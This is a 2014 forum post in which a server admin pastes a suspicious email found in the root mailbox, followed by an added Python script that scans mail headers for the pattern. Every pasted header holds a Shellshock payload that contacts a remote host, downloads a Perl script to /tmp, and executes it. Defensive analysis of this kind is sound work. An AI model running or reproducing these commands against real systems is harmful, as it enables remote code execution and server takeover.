Weird email log

#1 Mon, 11/10/2014 - 00:39
drguild

Saw this in the 'Read User Mail' area on the root account, not a virtual server's account. I check occasionally for things; dunno if I should be looking into it more or if it's fine.

I presume whoever sent this was trying to run an exploit via PHP and Postfix. I run CentOS 6.6, all up to date, so I don't know if it means anything, being the root account that had this message.

I doubt it's PHP as I don't use the Cc etc. fields on my site, so how the message got in listed as root I dunno.

Update: it appears from the headers it's probably just an auto emailer someone has searching out Postfix servers or something.

Nothing is in the /tmp/ directory that's related to this.

Return-Path: <>
X-Original-To: nobody
Delivered-To: nobody@110-175-205-112.static.tpgi.com.au
Received: from flounder.oxid8.com (flounder.oxid8.com [67.18.114.194])
by 110-175-205-112.static.tpgi.com.au (Postfix) with SMTP id 77B8B20003D
for <nobody>; Sat,  8 Nov 2014 13:05:22 +0800 (AWST)
To:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
References:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Cc:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
From:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Subject:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Date:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Message-ID:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Comments:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Keywords:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Resent-Date:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Resent-From:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Resent-Sender:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad

wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
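
One way to check stored mail for this kind of message, as an added example that is not part of the original post: it flags headers whose value begins with the bash function-definition prefix `() {` seen in the headers above, collects the URLs and temp-directory paths those headers reference, and reports which of the paths exist on disk. The sample message, its host names and the function names are constructed for illustration.

```python
import os
import re
from email import message_from_string

# Header value that starts like an exported bash function definition: "() {"
FUNC_PREFIX = re.compile(r"^\s*\(\)\s*\{")
# URLs and world-writable temp paths mentioned after the prefix
URL = re.compile(r"https?://[^\s;|&'\"]+")
TMP_PATH = re.compile(r"/(?:tmp|var/tmp|dev/shm)/[^\s;|&'\"]+")

# Constructed sample message (hosts and file names are placeholders).
SAMPLE = (
    "Return-Path: <>\n"
    "Received: from mail.example.invalid (mail.example.invalid [192.0.2.10])\n"
    "\tby mx.example.invalid (Postfix) with SMTP id 0000000000\n"
    "To:() { :; };wget http://host.example.invalid/x.txt -O /tmp/.sample;perl /tmp/.sample\n"
    "Subject:() { :; };wget http://host.example.invalid/x.txt -O /tmp/.sample;perl /tmp/.sample\n"
    "Date: Sat, 8 Nov 2014 13:05:22 +0800\n"
    "\n"
    "body\n"
)

def scan_message(raw):
    """Return flagged header names plus the URLs and temp paths they mention."""
    msg = message_from_string(raw)
    hits = {"headers": [], "urls": set(), "paths": set()}
    for name, value in msg.items():
        value = str(value)
        if FUNC_PREFIX.match(value):
            hits["headers"].append(name)
            hits["urls"].update(URL.findall(value))
            hits["paths"].update(TMP_PATH.findall(value))
    return hits

def existing_paths(paths):
    """Return the referenced paths that are present on this host."""
    return sorted(p for p in paths if os.path.lexists(p))

if __name__ == "__main__":
    result = scan_message(SAMPLE)
    print("flagged headers:", result["headers"])
    print("referenced URLs:", sorted(result["urls"]))
    print("paths present on disk:", existing_paths(result["paths"]))
```

A referenced path that exists on disk, or an outbound request to one of the referenced URLs in proxy or firewall logs, would indicate the payload ran rather than merely being delivered.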